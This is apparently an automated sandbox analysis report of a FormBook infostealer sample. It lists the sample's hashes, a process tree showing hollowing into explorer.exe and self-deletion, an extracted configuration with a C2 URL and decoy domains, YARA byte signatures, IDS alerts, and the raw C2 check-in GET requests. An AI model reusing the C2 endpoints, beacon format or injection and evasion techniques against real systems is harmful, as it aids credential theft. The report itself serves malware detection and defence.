Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 0O9BJfVJi6fEMoS.exe

Overview

General Information

Sample Name:0O9BJfVJi6fEMoS.exe
Analysis ID:356555
MD5:18ec78e09155c046a203fb4dcbc3593f
SHA1:40e67eef7c001a8752763616fc9a58170721c27a
SHA256:01c5ac824171a164473d92187f8031f2bc7103397fe534f56771d8e9589445e0
Tags:exeFormbookYahoo

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 0O9BJfVJi6fEMoS.exe (PID: 7028 cmdline: 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe' MD5: 18EC78E09155C046A203FB4DCBC3593F)
    • 0O9BJfVJi6fEMoS.exe (PID: 3492 cmdline: {path} MD5: 18EC78E09155C046A203FB4DCBC3593F)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6664 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • explorer.exe (PID: 6700 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6812 cmdline: /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.besteprobioticakopen.online/uszn/"], "decoy": ["animegriptape.com", "pcpnetworks.com", "putupmybabyforadoption.com", "xn--jvrr98g37n88d.com", "fertinvitro.doctor", "undonethread.com", "avoleague.com", "sissysundays.com", "guilhermeoliveiro.site", "catholicon-bespeckle.info", "mardesuenosfundacion.com", "songkhoe24.site", "shoecityindia.com", "smallbathroomdecor.info", "tskusa.com", "prairiespringsllc.com", "kegncoffee.com", "clicklounge.xyz", "catholicendoflifeplanning.com", "steelobzee.com", "xiknekiterapia.com", "whereinthezooareyou.com", "maglex.info", "dango3.net", "sqjqw4.com", "theparadisogroup.com", "karthikeyainfraindia.com", "luewevedre.com", "helpwithmynutrition.com", "lengyue.cool", "pbipropertiesllc.com", "glidedisc.com", "sz-rhwjkj.com", "776fx.com", "kamanantzin.com", "grandwhale.com", "trump2020shop.net", "gentilelibri.com", "jarliciouslounge.com", "dgcsales.net", "hypno.doctor", "holidayinnindyairportnorth.com", "buysellleasewithlisa.com", "girishastore.com", "tinynucleargenerators.com", "crystalphoenixltd.com", "lapplify.com", "bailbondinazusa.com", "michaelmery.com", "tripleecoaching.com", "fastenerspelosato.net", "horisan-touki.com", "marketingavacado.com", "centrebiozeina.com", "xn--3etz63bc5ck9c.com", "rhemachurch4u.com", "homeschoolangel.com", "romeysworld.com", "themixedveggies.com", "queendreea.club", "epedalflorida.com", "blutreemg.com", "nongfupingtai.com", "shikshs.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158a9:$sqlite3step: 68 34 1C 7B E1
        • 0x159bc:$sqlite3step: 68 34 1C 7B E1
        • 0x158d8:$sqlite3text: 68 38 2A 90 C5
        • 0x159fd:$sqlite3text: 68 38 2A 90 C5
        • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xaee68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xaf1f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd6288:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd6612:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xbaf05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xe2325:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xba9f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xe1e11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xbb007:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xe2427:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xbb17f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xe259f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xafc0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xd702a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xb9c6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xe108c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb0982:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xd7da2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xbfff7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xe7417:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xc109a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 4 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.besteprobioticakopen.online/uszn/Avira URL Cloud: Label: malware
          Source: http://www.besteprobioticakopen.online/uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoXAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.besteprobioticakopen.online/uszn/"], "decoy": ["animegriptape.com", "pcpnetworks.com", "putupmybabyforadoption.com", "xn--jvrr98g37n88d.com", "fertinvitro.doctor", "undonethread.com", "avoleague.com", "sissysundays.com", "guilhermeoliveiro.site", "catholicon-bespeckle.info", "mardesuenosfundacion.com", "songkhoe24.site", "shoecityindia.com", "smallbathroomdecor.info", "tskusa.com", "prairiespringsllc.com", "kegncoffee.com", "clicklounge.xyz", "catholicendoflifeplanning.com", "steelobzee.com", "xiknekiterapia.com", "whereinthezooareyou.com", "maglex.info", "dango3.net", "sqjqw4.com", "theparadisogroup.com", "karthikeyainfraindia.com", "luewevedre.com", "helpwithmynutrition.com", "lengyue.cool", "pbipropertiesllc.com", "glidedisc.com", "sz-rhwjkj.com", "776fx.com", "kamanantzin.com", "grandwhale.com", "trump2020shop.net", "gentilelibri.com", "jarliciouslounge.com", "dgcsales.net", "hypno.doctor", "holidayinnindyairportnorth.com", "buysellleasewithlisa.com", "girishastore.com", "tinynucleargenerators.com", "crystalphoenixltd.com", "lapplify.com", "bailbondinazusa.com", "michaelmery.com", "tripleecoaching.com", "fastenerspelosato.net", "horisan-touki.com", "marketingavacado.com", "centrebiozeina.com", "xn--3etz63bc5ck9c.com", "rhemachurch4u.com", "homeschoolangel.com", "romeysworld.com", "themixedveggies.com", "queendreea.club", "epedalflorida.com", "blutreemg.com", "nongfupingtai.com", "shikshs.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 0O9BJfVJi6fEMoS.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: explorer.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 0O9BJfVJi6fEMoS.exe, explorer.exe
          Source: Binary string: explorer.pdb source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 4x nop then pop edi6_2_0040C3CB
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi11_2_0097C3CB

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 184.106.16.223:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 202.66.173.116:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 94.23.162.163:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.besteprobioticakopen.online/uszn/
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1Host: www.fastenerspelosato.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1Host: www.sissysundays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1Host: www.whereinthezooareyou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1Host: www.fertinvitro.doctorConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1Host: www.dgcsales.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1Host: www.horisan-touki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1Host: www.karthikeyainfraindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1Host: www.buysellleasewithlisa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1Host: www.besteprobioticakopen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.246.6.109 35.246.6.109
          Source: Joe Sandbox ViewASN Name: NETMAGIC-APNetmagicDatacenterMumbaiIN NETMAGIC-APNetmagicDatacenterMumbaiIN
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1Host: www.fastenerspelosato.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1Host: www.sissysundays.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1Host: www.whereinthezooareyou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1Host: www.fertinvitro.doctorConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1Host: www.dgcsales.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1Host: www.horisan-touki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1Host: www.karthikeyainfraindia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1Host: www.buysellleasewithlisa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1Host: www.besteprobioticakopen.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.fastenerspelosato.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Tue, 23 Feb 2021 09:08:03 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://code.google.com/feeds/p/topicalmemorysystem/downloads/basic.xml
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://code.google.com/p/topicalmemorysystem/
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://topicalmemorysystem.googlecode.com/files/
          Source: explorer.exe, 00000007.00000002.913073739.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.biblegateway.com/passage/?search=
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.biblija.net/biblija.cgi?m=
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.blueletterbible.org/Bible.cfm?b=
